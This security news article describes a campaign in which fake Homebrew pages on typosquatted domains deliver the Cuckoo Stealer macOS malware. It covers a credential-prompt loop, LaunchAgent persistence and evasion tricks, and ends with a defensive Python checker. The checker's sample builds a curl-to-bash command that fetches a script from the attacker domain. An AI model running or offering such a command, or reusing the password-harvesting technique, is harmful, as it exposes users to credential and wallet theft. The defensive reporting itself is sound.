A sophisticated social engineering campaign is targeting macOS developers through phony Homebrew installation pages that install the extensive credential-harvesting malware Cuckoo Stealer. The attack uses the ClickFix technique, which deceives users into running malicious Terminal commands disguised as genuine software installation scripts.
In contrast to conventional exploits that target software vulnerabilities, this campaign takes advantage of user trust and familiar developer workflows. The operation centres on typosquatted domains hosting exact replicas of the official Homebrew website. Developers who visit these fraudulent pages are presented with what looks like the standard installation command, complete with a handy copy button. A single domain change, from raw.githubusercontent.com to raw.homabrews.org, distinguishes the malicious command from the legitimate one, and that change is subtle enough to evade a cursory examination.
Figure: Details of the homabrews.org domain registration in Hunt indicate a high-risk rating (Source: Hunt.io).
Hunt.io analysts identified this campaign after spotting the typosquatted domain homabrews.org, registered on January 13, 2026. The install script served from it harvests user credentials through a continuous password prompt loop built on macOS Directory Services, which ensures attackers hold valid credentials before the second-stage payload is deployed.
Figure: Phishing URL detection displays multiple flagged URLs, including the crucial raw.homabrews.org subdomain (Source: Hunt.io).
Infrastructure analysis found six interconnected domains hosted on shared infrastructure at IP address 5.255.123.244, with the earliest certificates dating back to July 2025.
Figure: Several malicious domains are housed on shared IP infrastructure at 5.255.123.244 (Source: Hunt.io).
To increase their deceptive effectiveness, the domains use a variety of typosquatting strategies, such as character omission, double-letter substitution, and alternative top-level domains.

Technical Infection Workflow

The attack is carried out in two phases.
The first-stage script poses as a genuine Homebrew installer while surreptitiously validating user passwords with the dscl authonly command. To avoid raising suspicion, this validation loop mimics standard sudo behavior exactly, displaying "Sorry, try again" for incorrect passwords. Once valid credentials have been obtained, the script downloads a binary called brew_agent. The stolen password, Base64-encoded, is passed to this binary as an argument so that it gains instant access to protected system resources.
Through the macOS LaunchAgent system, Cuckoo Stealer creates persistence by posing as com.homebrew.brewupdater.plist in order to blend in with the system's normal processes. Among its many anti-analysis strategies is locale-based filtering, which stops the malware from running on systems set up for Commonwealth of Independent States nations. It blocks Armenian, Belarusian, Kazakh, Russian, and Ukrainian locales.
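As an added illustration (not code from the article or from Hunt.io), here is a small Python helper a defender could use to check a pasted Homebrew install command against the genuine download host and to flag a LaunchAgent plist that imitates Homebrew, as the com.homebrew.brewupdater.plist persistence does. The allowlisted host comes from the official one-liner; the sample agent path and the assumption that genuine Homebrew installs no com.homebrew.* agents are mine.

```python
import plistlib
import re
from urllib.parse import urlparse

# Host the official Homebrew one-liner fetches install.sh from; anything else,
# such as raw.homabrews.org, is a red flag. A "brew" substring drives the lookalike test.
ALLOWED_HOSTS = {"raw.githubusercontent.com"}
URL_RE = re.compile(r"""https?://[^\s"')]+""")


def suspicious_hosts(command):
    """(host, looks_like_homebrew) for each URL host in a pasted install command
    that is not allowlisted. Any finding at all means: do not run the command."""
    findings = []
    for url in URL_RE.findall(command):
        host = (urlparse(url).hostname or "").lower()
        if host in ALLOWED_HOSTS:
            continue
        # Character omission, doubled letters and swapped TLDs all keep "brew".
        lookalike = any("brew" in label for label in host.split("."))
        findings.append((host, lookalike))
    return findings


def launch_agent_red_flags(plist_bytes):
    """Red flags for a ~/Library/LaunchAgents plist: a Homebrew-styled label, or a
    program outside Homebrew's prefixes. Assumption: genuine Homebrew installs no
    com.homebrew.* agents (brew services uses homebrew.mxcl.* labels)."""
    p = plistlib.loads(plist_bytes)
    label = p.get("Label", "")
    program = (p.get("ProgramArguments") or [p.get("Program", "")])[0]
    flags = []
    if label.startswith("com.homebrew."):
        flags.append("label imitates Homebrew: " + label)
    if program and not program.startswith(("/opt/homebrew/", "/usr/local/")):
        flags.append("program outside Homebrew prefix: " + program)
    return flags


# Constructed samples: the official one-liner, the campaign's single host swap,
# and a LaunchAgent plist modelled on the article's description (path invented).
GENUINE = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
PHONY = GENUINE.replace("raw.githubusercontent.com", "raw.homabrews.org")
AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.homebrew.brewupdater</string>
<key>ProgramArguments</key><array><string>/Users/dev/.brew_agent</string></array>
<key>RunAtLoad</key><true/></dict></plist>"""
```

Running the two checks over a clipboard contents or over every plist in ~/Library/LaunchAgents turns the article's two indicators into a repeatable pre-install and post-incident check.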
To avoid static analysis and signature detection, all sensitive strings are encrypted using XOR-based obfuscation with index-based key rotation.
Figure: A credential harvesting loop demonstrates password validation using macOS Directory Services (Source: Hunt.io).
The command-and-control channel uses encrypted HTTPS communications, with an X25519 elliptic curve Diffie-Hellman key exchange providing session encryption.
Figure: The second-stage payload download demonstrates Base64 encoding of stolen credentials (Source: Hunt.io).
With features like shell command execution, system reboot, self-destruct mechanisms, and controlled data exfiltration threads, the malware functions as a complete remote access trojan. It targets user credentials from all of the main macOS browsers, over 20 cryptocurrency wallet applications, macOS Keychain databases, Apple Notes, messaging apps like Telegram and Discord, and cryptocurrency wallet extensions like Coinbase Wallet and Phantom Wallet.